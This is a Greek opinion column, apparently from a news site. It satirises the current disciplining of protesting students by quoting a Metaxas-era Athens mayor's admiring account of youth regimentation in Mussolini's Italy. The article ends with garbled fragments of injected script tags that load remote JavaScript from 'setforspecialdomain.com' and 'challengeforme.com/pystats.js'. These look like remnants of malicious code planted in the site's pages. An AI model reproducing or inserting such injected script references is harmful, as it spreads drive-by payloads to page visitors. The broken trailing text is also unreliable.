Τεταμένον το πρόσωπον προς το μέλλον…Θανάσης Καρτερός

Φορτσάκης: Ολοκληρώθηκε η συνεδρίαση με απόλυτα νόμιμο τρόπο

Ώστε πολλοί νέοι αυθαδιάζουν, διαδηλώνουν, καταλαμβάνουν σχολεία, παρενοχλούν συγκλήτους. Προκαλούν έτσι την οργή ταγμένων στην ευταξία -και σε καμιά εκατοστή κρατικές θέσεις- πρυτάνεων. Αλλά και αυστηρές παραγγελίες ανωτάτων εισαγγελικών λειτουργών. Προφανώς διότι αντιστέκονται στο είδος του Λόγου που προωθείται με τη συνδρομή της ράβδου στην Παιδεία. Και τα στυλώνουν στη μαζική παραγωγή νέου τύπου νέου ανθρώπου, κατάλληλου για τη νέα Ελλάδα.

Πλανάται όμως όποιος όμως νομίζει ότι όλα αυτά είναι νέα. Ο δήμαρχος Αθηναίων και υπουργός του Μεταξά, εδώ και δεκαετίες, είδε ιδίοις όμμασι κι ομολόγησε το θαύμα αυτής της αλλαγής. Στην Ιταλία του Ντούτσε! Έχουν συνεπώς μια κάποια επικαιρότητα τα όσα τότε έγραψε. Εγκύψατε και μη γελάτε: “Εις την Ιταλίαν δημιουργείται, εδημιουργήθη ήδη, νέος τύπος ανθρώπου, νέος την αντίληψιν, τους προσανατολισμούς του, τον προορισμόν του, αλλ’ ιδίως νέος ως προς την επίγνωσιν καθηκόντων και υποχρεώσεων.

Εκεί δεν υφίσταται Δικτατορία υπό την στενήν έννοιαν ή υπό την έννοιαν, ήν προσέλαβεν ενταύθα η Δικτατορία. Δεν ασκείται βία υλική, αλλά πειθώ. Δεν εκβιάζεται το άτομον, αλλά μόνον του το άτομον υποβάλλεται, μόνον του προσαρμόζεται εις το δημιουργηθέν περιβάλλον, μόνον του εισέρχεται εις το πλαίσιον όπερ εχάραξε το Κράτος. Πας εντός πλαισίου αισθάνεται την άνεσιν και την θαλπωρήν, πας εκτός αυτού, μοιραίως, στερείται των καταπληκτικών πλεονεκτημάτων.

Τα παιδιά, μετά την λήξιν των μαθημάτων, με επικεφαλής ανά τάξιν τον κοσμήτορα μαθητήν, με παράγγελμα διδόμενον παρ’ αυτού, ‘έν δύο’ συντεταγμένα, σημειώνω ιδιαιτέρως πειθαρχημένα, και με ύφος σοβαρότατον, φθάνουν προ της εξωθύρας όπου αναμένει ο γονεύς. Εκεί μετά το παράγγελμα: Χαιρετισμόν εις τον Ντούτσε, την ύψωσιν της δεξιάς εις Ρωμαϊκόν χαιρετισμόν και την αναφώνησιν ‘α Νόι – Δικός μας’ λύουν τους ζυγούς και παραλαμβάνονται από την άλλην ωργανωμένην κρατικήν δύναμιν, την οικογένειαν.

Η Κυριακή δεν είναι ημέρα σχόλης και παιδικής αταξίας. Είναι ημέρα γυμνασίων, Αγώνων, εκδρομών. Πάντοτε όμως εις ομάδας πειθαρχούσας, με νέους έχοντας τεταμένον το πρόσωπον προς το μέλλον, πιστεύοντας εις εαυτούς, εις τον εμπνευστήν των, εις το Κράτος.

Ο Ιταλός ήλλαξε νοοτροπίαν, χαρακτήρα, αντίληψιν περί του προορισμού του ατόμου εν τη νεωτάτη κοινωνία και πολιτεία, ήν διεμόρφωσεν ο Φασισμός, ήν ενεπνεύσθη και ενέπνευσεν η προσωπικότης του Μπενίτο Μουσολίνι”.

Εν τη νεωτάτη κοινωνία! Αμήν…

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >